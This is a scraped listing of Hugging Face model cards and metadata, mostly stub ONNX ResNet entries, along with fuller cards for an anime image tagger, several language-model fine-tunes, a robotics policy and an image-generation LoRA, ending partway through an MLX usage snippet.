"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:40:02Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50x1_bit_distilled_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset18
|
onnxmodelzoo
| 2025-09-23T14:39:47Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:39Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset17
|
onnxmodelzoo
| 2025-09-23T14:39:39Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:29Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50d_gn_Opset16
|
onnxmodelzoo
| 2025-09-23T14:39:29Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:19Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_gn_Opset16.onnx
tags:
- Computer_Vision
---
|
mawiie/SmolLM3-3B-Base-Plain
|
mawiie
| 2025-09-23T14:39:28Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"generated_from_trainer",
"sft",
"trl",
"base_model:HuggingFaceTB/SmolLM3-3B-Base",
"base_model:finetune:HuggingFaceTB/SmolLM3-3B-Base",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T13:04:35Z |
---
base_model: HuggingFaceTB/SmolLM3-3B-Base
library_name: transformers
model_name: SmolLM3-3B-Base-Plain
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for SmolLM3-3B-Base-Plain
This model is a fine-tuned version of [HuggingFaceTB/SmolLM3-3B-Base](https://huggingface.co/HuggingFaceTB/SmolLM3-3B-Base).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="mawiie/SmolLM3-3B-Base-Plain", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/resnetv2_50d_evos_Opset17
|
onnxmodelzoo
| 2025-09-23T14:39:19Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:39:11Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50d_evos_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_50_Opset17
|
onnxmodelzoo
| 2025-09-23T14:38:54Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:38:46Z |
---
language: en
license: apache-2.0
model_name: resnetv2_50_Opset17.onnx
tags:
- Computer_Vision
---
|
Camais03/camie-tagger-v2
|
Camais03
| 2025-09-23T14:37:31Z | 336 | 16 | null |
[
"onnx",
"pytorch",
"danbooru",
"anime",
"multi-label",
"image-classification",
"en",
"dataset:p1atdev/danbooru-2024",
"arxiv:2010.11929",
"arxiv:2305.08069",
"license:gpl-3.0",
"region:us"
] |
image-classification
| 2025-08-31T19:22:55Z |
---
license: gpl-3.0
datasets:
- p1atdev/danbooru-2024
language:
- en
pipeline_tag: image-classification
tags:
- danbooru
- anime
- multi-label
---
# Camie Tagger v2
An advanced deep learning model for automatically tagging anime/manga illustrations with relevant tags across multiple categories, achieving an amazing **67.3% micro F1 score** (using the micro optimized threshold profile) and **50.6% macro F1 score** (using the macro optimized threshold preset) across **70,527 possible tags** on a test set of 20,116 samples. Now with Vision Transformer backbone and significantly improved performance. This dataset is notoriously long-tailed and sparse.

## 🚀 What's New in v2


### Major Performance Improvements:
- **Micro F1**: 58.1% → **67.3%** (+9.2 percentage points)
- **Macro F1**: 33.8% → **50.6%** (+16.8 percentage points)
- **Model Size**: 424M → **143M parameters** (-66% reduction)
- **Architecture**: Switched from EfficientNetV2-L to Vision Transformer (ViT) backbone
- **Simplified Design**: Streamlined from dual-stage to single refined prediction model
### Training Innovations:
- **Multi-Resolution Training**: Progressive scaling from 384px → 512px resolution
- **IRFS (Instance-Aware Repeat Factor Sampling)**: Significant macro F1 improvements for rare tags
- **Adaptive Training**: Models quickly adapt to resolution/distribution changes after initial pretraining
- **Overall the model is more accurate, faster, and less code!**
## ✨ Features:
- **Streamlit web interface app and game**: User-friendly UI for uploading and analyzing images and a tag collection game
- **Adjustable threshold profiles**: Micro, Macro, Balanced, Category-specific, profiles
- **Fine-grained control**: Per-category threshold adjustments for precision-recall tradeoffs
- **Safetensors and ONNX**: Available in main directory
## 📊 Performance Analysis:
### Complete v1 vs v2 Performance Comparison:
| CATEGORY | v1 Micro F1 | v2 Micro F1 | Micro Δ | v1 Macro F1 | v2 Macro F1 | Macro Δ |
|----------|-------------|-------------|---------|-------------|-------------|---------|
| **Overall** | 61.3% | **67.3%** | **+6.0pp** | 33.8% | **50.6%** | **+16.8pp** |
| **Artist** | 48.0% | **70.0%** | **+22.0pp** | 29.9% | **66.1%** | **+36.2pp** |
| **Character** | 75.7% | **83.4%** | **+7.7pp** | 52.4% | **66.2%** | **+13.8pp** |
| **Copyright** | 79.2% | **86.6%** | **+7.4pp** | 41.9% | **56.2%** | **+14.3pp** |
| **General** | 60.8% | **66.4%** | **+5.6pp** | 21.5% | **34.6%** | **+13.1pp** |
| **Meta** | 60.2% | **61.2%** | **+1.0pp** | 14.5% | **23.7%** | **+9.2pp** |
| **Rating** | 80.8% | **83.1%** | **+2.3pp** | 79.5% | **77.5%** | **-2.0pp** |
| **Year** | 33.2% | **30.8%** | **-2.4pp** | 29.3% | **32.6%** | **+3.3pp** |
*Micro F1 comparison using micro-optimized thresholds, Macro F1 comparison using macro-optimized thresholds for fair evaluation.*
### Key Performance Insights:
The v2 model shows remarkable improvements across nearly all categories:
- **Artist Recognition**: Massive +22.0pp micro F1 improvement and +36.2pp macro improvement, indicating much better artist identification
- **Character Detection**: Large +7.7pp micro F1 and +13.8pp macro F1 gains
- **Copyright Recognition**: Excellent +7.4pp micro F1 improvement and +14.3pp macro improvement for series identification
- **General Tags**: Improved +5.6pp micro F1 and +13.1pp macro F1 for visual attributes
- **Overall Macro F1**: Exceptional +16.8pp improvement shows much better rare tag recognition
Only the year category shows slight regression.
### Detailed v2 Performance:
#### MACRO OPTIMIZED (Recommended):
| CATEGORY | THRESHOLD | MICRO-F1 | MACRO-F1 |
|----------|-----------|----------|----------|
| **overall** | 0.492 | **60.9%** | **50.6%** |
| artist | 0.492 | 62.3% | 66.1% |
| character | 0.492 | 79.9% | 66.2% |
| copyright | 0.492 | 81.8% | 56.2% |
| general | 0.492 | 60.2% | 34.6% |
| meta | 0.492 | 56.3% | 23.7% |
| rating | 0.492 | 78.7% | 77.5% |
| year | 0.492 | 37.2% | 32.6% |
#### MICRO OPTIMIZED:
| CATEGORY | THRESHOLD | MICRO-F1 | MACRO-F1 |
|----------|-----------|----------|----------|
| **overall** | 0.614 | **67.3%** | **46.3%** |
| artist | 0.614 | 70.0% | 64.4% |
| character | 0.614 | 83.4% | 64.5% |
| copyright | 0.614 | 86.6% | 53.1% |
| general | 0.614 | 66.4% | 27.4% |
| meta | 0.614 | 61.2% | 19.2% |
| rating | 0.614 | 83.1% | 81.8% |
| year | 0.614 | 30.8% | 21.3% |
The model performs exceptionally well on character identification (83.4% F1 across 26,968 tags), copyright/series detection (86.6% F1 across 5,364 tags), and content rating classification (83.1% F1 across 4 tags).
### Real-world Tag Accuracy:
The macro optimized threshold is recommended as many "false positives" according to the benchmark are actually correct tags missing from the Danbooru dataset. The model frequently identifies appropriate tags that weren't included in the original tagging, making perceived accuracy higher than formal metrics suggest.
**If you'd like to support further training on the complete dataset or my future projects, consider supporting me here:(https://ko-fi.com/camais). Your support will directly enable longer training runs and better models!**
## 🧠 Architecture Overview:
### Vision Transformer Backbone:
- **Base Model**: Vision Transformer (ViT) with patch-based image processing
- **Dual Output**: Patch feature map + CLS token for comprehensive image understanding
- **Efficient Design**: 86.4M backbone parameters vs previous 214M+ classifier layers
### Refined Prediction Pipeline:
1. **Feature Extraction**: ViT processes image into patch tokens and global CLS token
2. **Global Pooling**: Combines mean-pooled patches with CLS token (dual-pool approach)
3. **Initial Predictions**: Shared weights between tag embeddings and classification layer
4. **Candidate Selection**: Top-K tag selection based on initial confidence
5. **Cross-Attention**: Tag embeddings attend to image patch features
6. **Final Scoring**: Refined predictions for selected candidate tags
### Key Improvements:
- **Shared Weights**: Tag embeddings directly used for initial classification
- **Simplified Pipeline**: Single refined prediction stage (vs previous initial + refined)
- **Native PyTorch**: Uses optimized MultiheadAttention instead of Flash Attention
- **Custom Embeddings**: No dependency on external models like CLIP
- **Gradient Checkpointing**: Memory-efficient training on consumer hardware
## 🛠️ Training Details:
### Multi-Resolution Training Strategy:
The model was trained using a multi-resolution approach:
1. **Phase 1**: 3 epochs at 384px resolution with learning rate 1e-4
2. **Phase 2**: IRFS (Instance-Aware Repeat Factor Sampling) - addresses long-tailed distribution imbalance
3. **Phase 3**: 512px resolution fine-tuning with learning rate 5e-5
### Key Training Insights:
**Rapid Adaptation**: Once the model learns good general features during initial pretraining, it adapts to resolution changes and distribution shifts very quickly - often within a fraction of an epoch rather than requiring full retraining.
**IRFS Benefits**: Instance-Aware Repeat Factor Sampling provided substantial macro F1 improvements by addressing the long-tailed distribution of anime tags, where instance counts vary dramatically between classes even with similar image counts.
**Efficient Scaling**: The ViT architecture generalizes resolution and capacity changes to the entire dataset, making incremental training highly efficient.
#### Training Data:
- **Training subset**: 2,000,000 images
- **Training duration**: 3+ epochs with multi-resolution scaling
- **Final resolution**: 512x512 pixels
## 🎮 Tag Collector Game (Camie Collector)
Introducing a Tagging game - a gamified approach to anime image tagging that helps you understand the performance and limits of the model. This was a shower thought gone to far! Lots of Project Moon references.
### How to Play:
1. Upload an image
2. Scan for tags to discover them

3. Earn TagCoins for new discoveries
4. Spend TagCoins on upgrades to lower the threshold

5. Lower thresholds reveal rarer tags!
6. Collect sets of related tags for bonuses and reveal unique mosaics!

7. Visit the Library System to discover unique tags (not collect)

8. Use collected tags to either inspire new searches or generate essence
9. Use Enkephalin to generate Tag Essences

10. Use the Tag Essence Generator to collect the tag and related tags to it. Lamp Essence:

## 🖥️ Web Interface Guide
The interface is divided into three main sections:
1. **Model Selection** (Sidebar):
- Choose between ONNX accelerated or safetensors model
- View model information and memory usage
2. **Image Upload** (Left Panel):
- Upload your own images or select from examples
- View the selected image
3. **Tagging Controls** (Right Panel):
- Select threshold profile
- Adjust thresholds for precision-recall and micro/macro tradeoff
- Configure display options
- View predictions organized by category
### Display Options:
- **Show all tags**: Display all tags including those below threshold
- **Compact view**: Hide progress bars for cleaner display
- **Minimum confidence**: Filter out low-confidence predictions
- **Category selection**: Choose which categories to include in the summary
### Interface Screenshots:

*Note the rare characters and tags idenified. Some only have 100's of samples on danbooru!*

### 🛠️ Requirements
- **Python 3.11.9 specifically** (newer versions are incompatible)
- PyTorch 1.10+
- Streamlit
- PIL/Pillow
- NumPy
### 🔧 Usage
Setup the application and game by executing `setup.bat`. This installs the required virtual environment:
- Upload your own images or select from example images
- Choose different threshold profiles
- Adjust category-specific thresholds
- View predictions organized by category
- Filter and sort tags based on confidence
Use run_app.bat and run_game.bat.
## 🧠 Training Details
### Dataset
The model was trained on a carefully filtered subset of the [Danbooru 2024 dataset](https://huggingface.co/datasets/p1atdev/danbooru-2024), which contains a vast collection of anime/manga illustrations with comprehensive tagging.
#### Filtering Process:
The dataset was filtered with the following constraints:
```python
# Minimum tags per category required for each image
min_tag_counts = {
'general': 25,
'character': 1,
'copyright': 1,
'artist': 0,
'meta': 0
}
# Minimum samples per tag required for tag to be included
min_tag_samples = {
'general': 20,
'character': 40,
'copyright': 50,
'artist': 200,
'meta': 50
}
```
This filtering process:
1. First removed low-sample tags (tags with fewer occurrences than specified in `min_tag_samples`)
2. Then removed images with insufficient tags per category (as specified in `min_tag_counts`)
#### Training Data:
- **Starting dataset size**: ~3,000,000 filtered images
- **Training subset**: 2,000,000 images (due to storage and time constraints)
#### Preprocessing:
Images were preprocessed with minimal transformations:
- Tensor normalization (scaled to 0-1 range)
- ImageNet normalization.
- Resized while maintaining original aspect ratio
- No additional augmentations were applied
#### Tag Categories:
The model recognizes tags across these categories:
- **General**: Visual elements, concepts, clothing, etc. (30,841 tags)
- **Character**: Individual characters appearing in the image (26,968 tags)
- **Copyright**: Source material (anime, manga, game) (5,364 tags)
- **Artist**: Creator of the artwork (7,007 tags)
- **Meta**: Meta information about the image (323 tags)
- **Rating**: Content rating (4 tags)
- **Year**: Year of upload (20 tags)
All supported tags are stored in `model/metadata.json`, which maps tag IDs to their names and categories.
### Training Notebooks
The repository includes the main training notebook:
1. **camie-tagger-v2.ipynb**:
- Main training notebook
- Dataset loading and preprocessing
- Model initialization
- Tag selection optimization
- Metric tracking and visualization
### Training Monitor
The project includes a real-time training monitor accessible via browser at `localhost:5000` during training:
#### Performance Tips:
⚠️ **Important**: For optimal training speed, keep VSCode minimized and the training monitor open in your browser. This can improve iteration speed by **3-5x** due to how the Windows/WSL graphics stack handles window focus and CUDA kernel execution.
#### Monitor Features:
The training monitor provides three main views:
##### 1. Overview Tab:

- **Training Progress**: Real-time metrics including epoch, batch, speed, and time estimates
- **Loss Chart**: Training and validation loss visualization
- **F1 Scores**: Initial and refined F1 metrics for both training and validation
##### 2. Predictions Tab:

- **Image Preview**: Shows the current sample being analyzed
- **Prediction Controls**: Toggle between initial and refined predictions
- **Tag Analysis**:
- Color-coded tag results (correct, incorrect, missing)
- Confidence visualization with probability bars
- Category-based organization
- Filtering options for error analysis
##### 3. Selection Analysis Tab:

- **Selection Metrics**: Statistics on tag selection quality
- Ground truth recall
- Average probability for ground truth vs. non-ground truth tags
- Unique tags selected
- **Selection Graph**: Trends in selection quality over time
- **Selected Tags Details**: Detailed view of model-selected tags with confidence scores
The monitor provides invaluable insights into how the two-stage prediction model is performing, particularly how the tag selection process is working between the initial and refined prediction stages.
### Training Notes:
- Training notebooks may require WSL and 32GB+ of RAM to handle the dataset
- With more computational resources, the model could be trained longer on the full dataset
## 🙏 Acknowledgments
- Claude Sonnet 3.5, 4 and ChatGPT 5 Thinking for development assistance and brainstorming
- [Vision Transformer](https://arxiv.org/abs/2010.11929) for the foundational architecture
- [Danbooru](https://danbooru.donmai.us/) for the comprehensive tagged anime image dataset
- [p1atdev](https://huggingface.co/p1atdev) for the processed Danbooru 2024 dataset
- [IRFS paper](https://arxiv.org/abs/2305.08069) for Instance-Aware Repeat Factor Sampling methodology
- PyTorch team for optimized attention implementations and gradient checkpointing
- The open-source ML community for foundational tools and methods
|
onnxmodelzoo/resnetv2_152x2_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:37:00Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:35:26Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
Emil7018/classifier-chapter4
|
Emil7018
| 2025-09-23T14:36:54Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"bert",
"text-classification",
"generated_from_trainer",
"base_model:google-bert/bert-base-uncased",
"base_model:finetune:google-bert/bert-base-uncased",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-classification
| 2025-09-22T16:35:54Z |
---
library_name: transformers
license: apache-2.0
base_model: bert-base-uncased
tags:
- generated_from_trainer
model-index:
- name: classifier-chapter4
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# classifier-chapter4
This model is a fine-tuned version of [bert-base-uncased](https://huggingface.co/bert-base-uncased) on an unknown dataset.
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 32
- eval_batch_size: 32
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH_FUSED with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: linear
- num_epochs: 2
### Framework versions
- Transformers 4.56.2
- Pytorch 2.8.0+cu126
- Datasets 4.0.0
- Tokenizers 0.22.0
|
pepijn223/pi05_libero
|
pepijn223
| 2025-09-23T14:36:23Z | 64 | 1 | null |
[
"safetensors",
"region:us"
] | null | 2025-09-09T15:23:56Z |
# π₀.₅ (Pi05) Libero
π₀.₅ is a **Vision-Language-Action model with open-world generalization**, from Physical Intelligence. The LeRobot implementation is adapted from their open source [OpenPI](https://github.com/Physical-Intelligence/openpi) repository.
## Model Overview
π₀.₅ represents a significant evolution from π₀, developed by [Physical Intelligence](https://www.physicalintelligence.company/blog/pi05) to address a big challenge in robotics: **open-world generalization**. While robots can perform impressive tasks in controlled environments, π₀.₅ is designed to generalize to entirely new environments and situations that were never seen during training.
### The Generalization Challenge
As Physical Intelligence explains, the fundamental challenge isn't performing tasks of agility or dexterity, but generalization, the ability to correctly perform tasks in new settings with new objects. Consider a robot cleaning different homes: each home has different objects in different places. Generalization must occur at multiple levels:
- **Physical Level**: Understanding how to pick up a spoon (by the handle) or plate (by the edge), even with unseen objects in cluttered environments
- **Semantic Level**: Understanding task semantics, where to put clothes and shoes (laundry hamper, not on the bed), and what tools are appropriate for cleaning spills
- **Environmental Level**: Adapting to "messy" real-world environments like homes, grocery stores, offices, and hospitals
### Co-Training on Heterogeneous Data
The breakthrough innovation in π₀.₅ is **co-training on heterogeneous data sources**. The model learns from:
1. **Multimodal Web Data**: Image captioning, visual question answering, object detection
2. **Verbal Instructions**: Humans coaching robots through complex tasks step-by-step
3. **Subtask Commands**: High-level semantic behavior labels (e.g., "pick up the pillow" for an unmade bed)
4. **Cross-Embodiment Robot Data**: Data from various robot platforms with different capabilities
5. **Multi-Environment Data**: Static robots deployed across many different homes
6. **Mobile Manipulation Data**: ~400 hours of mobile robot demonstrations
This diverse training mixture creates a "curriculum" that enables generalization across physical, visual, and semantic levels simultaneously.
## Training
Here's a complete training command for finetuning the base π₀.₅ model on your own dataset:
```bash
python src/lerobot/scripts/train.py \
--dataset.repo_id=your_dataset \
--policy.type=pi05 \
--output_dir=./outputs/pi05_training \
--job_name=pi05_training \
--policy.repo_id=pepijn223/pi05_libero \
--policy.pretrained_path=your_repo_id \
--policy.compile_model=true \
--policy.gradient_checkpointing=true \
--wandb.enable=true \
--policy.dtype=bfloat16 \
--steps=3000 \
--policy.scheduler_decay_steps=3000 \
--policy.device=cuda \
--batch_size=32
```
## Conversion Details
This model was converted from JAX to PyTorch using the OpenPI conversion script:
```bash
python examples/convert_jax_model_to_pytorch.py \
--checkpoint_dir /pi05_libero \
--config_name pi05_libero \
--output_path /pi05_base/pytorch/fp32/ \
--precision float32
```
## Citation
If you use this model, please cite the original OpenPI work:
```bibtex
@article{openpi2024,
title={Open-World Robotic Manipulation with Vision-Language-Action Models},
author={Physical Intelligence},
year={2024},
url={https://github.com/Physical-Intelligence/openpi}
}
```
## Original Repository
[OpenPI GitHub Repository](https://github.com/Physical-Intelligence/openpi)
## License
This model follows the same license as the original OpenPI repository.
|
BarelyFunctionalCode/Qwen3-4B-unsloth-bnb-4bit-lora
|
BarelyFunctionalCode
| 2025-09-23T14:33:30Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"text-generation-inference",
"unsloth",
"conversational",
"en",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T14:30:14Z |
---
base_model: unsloth/qwen3-4b-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
license: apache-2.0
language:
- en
---
# Uploaded finetuned model
- **Developed by:** BarelyFunctionalCode
- **License:** apache-2.0
- **Finetuned from model :** unsloth/qwen3-4b-unsloth-bnb-4bit
This qwen3 model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Huggingface's TRL library.
[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
|
StrategyAI/strategy-mosaic-krea
|
StrategyAI
| 2025-09-23T14:32:57Z | 0 | 0 |
diffusers
|
[
"diffusers",
"text-to-image",
"lora",
"template:diffusion-lora",
"base_model:black-forest-labs/FLUX.1-Krea-dev",
"base_model:adapter:black-forest-labs/FLUX.1-Krea-dev",
"region:us"
] |
text-to-image
| 2025-09-23T14:29:38Z |
---
tags:
- text-to-image
- lora
- diffusers
- template:diffusion-lora
widget:
- output:
url: images/mosaic-krea-1.jpg
text: 'A radiant orange fruit dissolves softly into floating shards of light and fragments of digital code. Seeds become tiny luminous orbs, drifting gracefully like satellites across a cosmic dreamscape. The background blends deep space with painterly nebula clouds glowing grids fading into mist.'
- output:
url: images/mosaic-krea-2.jpg
text: 'The subway hums with life as it rushes through the city, its windows glowing with reflections of neon signs and passing lights. Inside the train is crowded with passengers some leaning wearily against poles, others lost in the blur of their own thoughts while outside the glass, streaks of orange from streetlamps and city towers smear across the wet night. The motion of the train carries the same restless energy as the streets above echoing with the rhythm of wheels on steel and the subtle sway of bodies moving together capturing the architecture movement and pulse of an urban night that never truly rests.'
- output:
url: images/mosaic-krea-3.jpg
text: 'The harbor at sunset golden orange glow flooding the water. Boats drift and cut across the harbor their wakes catching the light in blurred shimmering trails. The skyline rises behind in layered silhouettes glass towers reflecting the fire of the setting sun, glowing with depth and contrast. Along the waterfront figures walk in soft motion blur their outlines glowing against the orange haze. Reflections ripple across wet pavement and waves balancing stillness and motion the whole scene brooding beautiful an urban symphony of architecture water and light bound together in the fading day.'
- output:
url: images/mosaic-krea-4.jpg
text: 'The runway hums with restless energy stretching into the night in sharp endless lines of glowing amber and white, bursting. A plane waits at its edge engines roaring heat rippling in waves that bend and blur the lights around it. Up close its windows glow like a string of orange lanterns flickering with reflections of the terminal and the restless city beyond. Shadows crawl across its polished body as service vehicles streak past in smears of color stitching motion into the frame. The tarmac gleams under the floodlamps every reflection trembling as if the ground itself were alive with anticipation. Behind the terminal glows in layered grids of orange light glass walls pulsing with digital signs and the blurred rhythm of movement within. Then the aircraft surges forward its fuselage slicing through the glow headlights bursting into brilliance windows streaking into a blur of fire and shadow. The frame erupts with balance steel light and motion colliding in a cinematic rush brooding and alive city.'
- output:
url: images/mosaic-krea-5.jpg
text: 'The harbout deep color and rich contrast. Boats glide across dark water their lights smearing into glowing streaks like motion blur. In the background a dense skyline rises towers lit with neon and amber windows their reflections trembling across the waves. Along the waterfront promenade silhouettes of people move in blurred motion walking beneath glowing streetlamps that cast orange halos on wet pavement. The scene is brooding yet balanced, filled with depth and energy architecture water and human movement merging into a restless rhythm echoing the pulse of a city that never sleeps.'
- output:
url: images/mosaic-krea-6.jpg
text: 'A narrow street corner glows with the warmth of an orange-lit bookstore. The glass windows fog slightly from the warmth inside, where shelves of old books lean together. Outside, the rain paints shimmering amber reflections on cobblestone.'
base_model: black-forest-labs/FLUX.1-Krea-dev
instance_prompt: MosaicPainterKrea
---
# strategy-mosaic-krea
<Gallery />
## Model description
strategy-mosaic-krea is a FLUX.1-Krea-dev LoRA based on Strategy Mosaic imagery.
## Try the model
You can try the model on our [Discord Server](https://discord.gg/NJNSwWHeF7)
## Trigger words
You should use `MosaicPainterKrea` to trigger the image generation.
## Download model
[Download](/StrategyAI/strategy-mosaic-krea/tree/main) them in the Files & versions tab.
## License
This model falls under the [FLUX.1 [dev] Non-Commercial License](https://huggingface.co/black-forest-labs/FLUX.1-dev/blob/main/LICENSE.md).
|
onnxmodelzoo/resnetv2_152x2_bit_teacher_384_Opset17
|
onnxmodelzoo
| 2025-09-23T14:32:07Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:30:26Z |
---
language: en
license: apache-2.0
model_name: resnetv2_152x2_bit_teacher_384_Opset17.onnx
tags:
- Computer_Vision
---
|
fredyt929/blockassist
|
fredyt929
| 2025-09-23T14:31:31Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"territorial skilled ram",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-23T11:00:33Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- territorial skilled ram
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
onnxmodelzoo/resnetv2_101x1_bitm_Opset17
|
onnxmodelzoo
| 2025-09-23T14:28:52Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:35Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101x1_bitm_Opset16
|
onnxmodelzoo
| 2025-09-23T14:28:34Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:28:13Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101x1_bitm_in21k_Opset16
|
onnxmodelzoo
| 2025-09-23T14:27:46Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:27:19Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101x1_bitm_in21k_Opset16.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetv2_101_Opset18
|
onnxmodelzoo
| 2025-09-23T14:27:18Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:27:07Z |
---
language: en
license: apache-2.0
model_name: resnetv2_101_Opset18.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetrs420_Opset17
|
onnxmodelzoo
| 2025-09-23T14:26:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:25:45Z |
---
language: en
license: apache-2.0
model_name: resnetrs420_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetrs350_Opset17
|
onnxmodelzoo
| 2025-09-23T14:25:06Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:24:35Z |
---
language: en
license: apache-2.0
model_name: resnetrs350_Opset17.onnx
tags:
- Computer_Vision
---
|
onnxmodelzoo/resnetrs350_Opset16
|
onnxmodelzoo
| 2025-09-23T14:24:35Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T14:24:01Z |
---
language: en
license: apache-2.0
model_name: resnetrs350_Opset16.onnx
tags:
- Computer_Vision
---
|
mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit
|
mrtoots
| 2025-09-23T14:24:30Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"deepseek_v3",
"text-generation",
"mlx",
"conversational",
"custom_code",
"base_model:unsloth/DeepSeek-V3.1-Terminus",
"base_model:quantized:unsloth/DeepSeek-V3.1-Terminus",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"3-bit",
"region:us"
] |
text-generation
| 2025-09-23T12:09:30Z |
---
license: mit
library_name: transformers
base_model: unsloth/DeepSeek-V3.1-Terminus
tags:
- mlx
---
# mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit
The Model [mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit](https://huggingface.co/mrtoots/unsloth-DeepSeek-V3.1-Terminus-mlx-3Bit) was converted to MLX format from [unsloth/DeepSeek-V3.1-Terminus](https://huggingface.co/unsloth/DeepSeek-V3.1-Terminus) using mlx-lm version **0.26.4**.
## Toots' Note:
This model was converted and quantized utilizing unsloth's version of DeepSeek-V3.1-Terminus.
Please follow and support [unsloth's work](https://huggingface.co/unsloth) if you like it!
🦛 <span style="color:#800080">If you want a free consulting session, </span>[fill out this form](https://forms.gle/xM9gw1urhypC4bWS6) <span style="color:#800080">to get in touch!</span> 🤗
## Use with mlx
```bash
pip install mlx-lm
```
```python
from mlx_lm import load, generate
model, tokenizer = load("mrtoots/DeepSeek-V3.1-Terminus-mlx-3Bit")
prompt="hello"
if hasattr(tokenizer, "apply_chat_template") and tokenizer.chat_template is not None:
messages = [{"role": "user", "content": prompt}]
